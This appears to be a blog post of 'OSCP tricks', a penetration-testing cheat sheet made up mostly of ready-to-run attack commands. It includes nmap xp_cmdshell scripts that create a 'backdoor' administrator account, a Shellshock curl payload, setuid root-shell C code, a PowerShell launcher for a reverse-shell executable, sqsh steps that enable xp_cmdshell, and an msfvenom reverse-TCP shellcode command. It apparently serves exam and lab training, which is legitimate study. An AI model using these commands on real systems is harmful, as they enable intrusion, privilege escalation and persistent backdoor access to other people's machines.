OSCP tricks
+ Upgrading simple shells to fully interactive TTYs
+ Make browser appear as a search engine
Use curl (serch engine agents: googlebot, slurp, msnbot…)
+ Change headers of a http request using curl
Example: check for shellshock vulnerability: (PoC: '() { :; }; echo “CVE-2014-6271 vulnerable”' bash -c id )
+ Execute process as another user (with credentials)
+ Setuid binary for root shell
Alternatively
Alternatively
+ Leverage xp_cmdshell to get a shell
+ Bypassing white-listing
+ Create small shellcode
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
+ Temporary Web Server
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
+ Use Nmap to remotely execute commands through SQLnmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse 10.11.1.31 -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators backdoor /add"
+ Make browser appear as a search engine
Use curl (serch engine agents: googlebot, slurp, msnbot…)
curl -A "'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')"
'http://<victim_ip>/robots.txt'
+ Change headers of a http request using curl
Example: check for shellshock vulnerability: (PoC: '() { :; }; echo “CVE-2014-6271 vulnerable”' bash -c id )
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
+ Execute process as another user (with credentials)
- Create a ps1 file e.g. run.ps1 with powershell commands as below:
$secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
[System.Diagnostics.Process]::Start("C:/users/public/<reverse_shell.exe>","", $mycreds.Username, mycreds.Password, $computer) - Upload run.ps1 to victim's machine
- Execute powershell command:
powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1
https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
+ Setuid binary for root shell
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
Alternatively
#include <stdio.h>
#include <unistd.h>
main()
{
setuid(0);
execl("/bin/sh","sh",0);
printf("You are root");
}
gcc -o rootme rootme.c
chown root:root && chmod 4777 /var/tmp/rootme
Alternatively
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p
+ Leverage xp_cmdshell to get a shell
sqsh -S <ip_address> -U sa -P <password>
exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go
xp_cmdshell 'dir C:\'
go
+ Bypassing white-listing
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
+ Create small shellcode
msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<ip> LPORT=443 -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov
0 comments:
Post a Comment